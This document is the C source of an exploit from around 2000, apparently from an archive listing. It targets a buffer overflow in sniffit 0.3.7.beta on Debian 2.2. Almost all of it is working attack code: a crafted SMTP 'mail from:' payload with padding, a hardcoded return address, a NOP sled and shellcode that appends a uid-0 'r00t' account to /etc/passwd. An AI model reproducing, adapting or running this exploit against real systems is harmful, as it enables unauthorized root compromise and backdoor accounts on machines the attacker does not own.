home *** CD-ROM | disk | FTP | other *** search
- /*
- * 5niffi7.c - exploiting sniffit 0.3.7.beta for Debian 2.2
- * Copyright (C) 2000 Michel "MaXX" Kaempf <maxx@via.ecp.fr>
- *
- * When a running sniffit session logs the packet sent by 5niffi7,
- * the following shellcode is executed. This shellcode adds the
- * line "r00t:36msvq8vbkg5k:0:0:r00t:/:/bin/sh" to /etc/passwd.
- * Cracking r00t's password should not be too hard :-)
- *
- * 5niffi7.c is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License as published by
- * the Free Software Foundation; either version 2 of the License, or
- * (at your option) any later version.
- *
- * This program is distributed in the hope that it will be useful,
- * but WITHOUT ANY WARRANTY; without even the implied warranty of
- * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
- * GNU General Public License for more details.
- *
- * You should have received a copy of the GNU General Public License
- * along with this program; if not, write to the Free Software
- * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
- */
-
- #include <netinet/in.h>
- #include <sys/types.h>
- #include <sys/socket.h>
- #include <string.h>
- #include <sys/socket.h>
- #include <netinet/in.h>
- #include <arpa/inet.h>
- #include <stdio.h>
- #include <stdlib.h>
- #include <unistd.h>
-
- #define FROM "mail from: "
- #define RET 0xbfff6b5b
-
- char shellcode[] =
- "\xeb\x5b\x90\x90\x90\x90\x90\x90"
- "\x90\x90\x5e\x80\x6e\xd9\x1a\x80"
- "\x6e\xdd\x1a\x80\x6e\xd7\x1a\x80"
- "\x6e\xc4\x1a\x80\x6e\xe4\x1a\x90"
- "\x90\x90\x90\x31\xc0\x88\x60\x0b"
- "\xb0\x05\x89\xf3\x31\xc9\x66\xb9"
- "\x01\x04\x31\xd2\xcd\x80\x89\xc7"
- "\xc6\x60\x31\x24\x31\xc0\x88\x60"
- "\x32\xb0\x04\x89\xfb\x8d\x68\x0c"
- "\x31\xd2\xb2\x26\xcd\x80\x31\xc0"
- "\xb0\x06\x89\xfb\xcd\x80\x31\xdb"
- "\x89\xd8\x40\xcd\x80\xe8\xa8\xff"
- "\xff\xff\x2f\x65\x74\x63\x2f\x70"
- "\x61\x73\x73\x77\x64\x78\x72\x30"
- "\x30\x74\x3a\x33\x36\x6d\x73\x76"
- "\x71\x38\x76\x62\x6b\x67\x35\x6b"
- "\x3a\x30\x3a\x30\x3a\x72\x30\x30"
- "\x74\x3a\x2f\x3a\x2f\x62\x69\x6e"
- "\x2f\x73\x68\x78\x78";
-
- int main( int argc, char * argv[] )
- {
- int sock_client;
- struct sockaddr_in addr_server, addr_client;
- int i, j;
- char * ip_src, * ip_dst;
- char conn[ 256 ], msg[ 1500 ];
-
- if ( argc != 2 )
- {
- fprintf( stderr, "Usage: %s IP\n", argv[0] );
- exit( -1 );
- }
-
- if ( (sock_client = socket(PF_INET, SOCK_STREAM, 0)) < 0 )
- {
- exit( -1 );
- }
-
- bzero( (void *)&addr_server, sizeof(struct sockaddr_in) );
- addr_server.sin_family = AF_INET;
- addr_server.sin_port = htons( 25 );
- inet_aton( argv[1], &addr_server.sin_addr );
-
- if ( connect(sock_client, (struct sockaddr *)&addr_server, sizeof(struct sockaddr_in)) < 0 )
- {
- exit( -1 );
- }
-
- i = sizeof( struct sockaddr );
- getsockname( sock_client, (struct sockaddr *)&addr_client, &i );
-
- ip_src = strdup( inet_ntoa(addr_client.sin_addr) );
- ip_dst = strdup( inet_ntoa(addr_server.sin_addr) );
- snprintf( conn, sizeof(conn), "%s.%u-%s.%u", ip_src, ntohs(addr_client.sin_port), ip_dst, ntohs(addr_server.sin_port) );
- free( ip_src );
- free( ip_dst );
-
- bzero( msg, sizeof(msg) );
- i = 0;
- for ( j = 0; j < strlen(FROM); i++, j++ )
- {
- msg[ i ] = FROM[ j ];
- }
- for ( j = 0; j < 256 - strlen(conn) - strlen(": mail [") - strlen(FROM); i++, j++ )
- {
- msg[ i ] = 'A';
- }
- *((unsigned long *)(&(msg[i]))) = RET;
- i += 4;
- for ( j = 0; j < 1024; i++, j++ )
- {
- msg[ i ] = 0x90;
- }
- for ( j = 0; j < strlen(shellcode); i++, j++ )
- {
- msg[ i ] = shellcode[ j ];
- }
-
- if ( write(sock_client, msg, strlen(msg)) < 0 )
- {
- exit( -1 );
- }
-
- close( sock_client );
-
- exit( 0 );
- }
-
